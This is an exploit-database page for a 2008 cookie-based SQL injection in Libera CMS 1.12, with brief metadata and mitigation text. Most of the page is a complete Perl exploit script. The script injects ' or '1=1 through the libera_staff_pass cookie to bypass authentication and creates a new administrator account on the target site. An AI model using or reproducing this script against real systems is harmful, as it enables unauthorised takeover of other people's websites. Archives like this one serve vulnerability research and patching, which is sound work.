Libera CMS - exploit.company

vendor:

Libera CMS

by:

StAkeR

9.3

CVSS

HIGH

SQL Injection

CWE

Product Name: Libera CMS

Affected Version From: 1.12

Affected Version To: 1.12

Patch Exists: Yes

Related CWE: N/A

CPE: a:libera_cms:libera_cms:1.12

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit

This exploit allows an attacker to add a new admin with their own credentials by exploiting a SQL injection vulnerability in Libera CMS version 1.12. The exploit uses a cookie to inject malicious SQL code into the application. The attacker can then use the new admin credentials to gain access to the application.

Mitigation:

The application should be updated to the latest version of Libera CMS and input validation should be implemented to prevent malicious SQL code from being injected.

Source

Exploit-DB raw data:

#!/usr/bin/perl
 # ----------------------------------------------------------
 # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit
 # Perl Exploit - Add a new admin with your credentials!
 # Author: StAkeR - StAkeR[at]hotmail[dot]it
 # ----------------------------------------------------------
 # Usage: perl http://localhost/cms StAkeR obscure
 # ----------------------------------------------------------

 use strict;
 use LWP::UserAgent;

 my ($hostname,$username,$password) = @ARGV;
 my $request  = undef;
 my $http_s   = new LWP::UserAgent or die $!;

 $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
 banner() unless $username and $password;

 $http_s->agent("Mozilla/4.5 [en] (Win95; U)");
 $http_s->timeout(1);
 $http_s->default_header('Cookie' => "libera_staff_pass=' or '1=1");           

 $request = $http_s->post($hostname."/admin.php?action=add_user_process",
                         [
                          username       => $username,
                          password       => $password,
                          password_again => $password,
                          email          => 0,
                          su             => 1,
                          submit         => "Add+User"
                        ]);
        
 if($request->is_success)
 {
   if($request->content =~ /added successfully/i)
   {
     print "[+] Exploit Done!\n";
     print "[+] Added New Administrator:\n\n";
     print "[+] Username: ${username}\n";
     print "[+] Password: ${password}\n";
   }
   else
   {
     print "[!] Exploit Failed!\n";
     print "[!] Site Not Vulnerable\n";
   }
 }


 sub banner
 {
   print "[+] Libera CMS <= 1.2 Remote SQL Injection Exploit (add new admin)\n";
   print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
   print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n";
   return exit;
 }

# milw0rm.com [2008-09-10]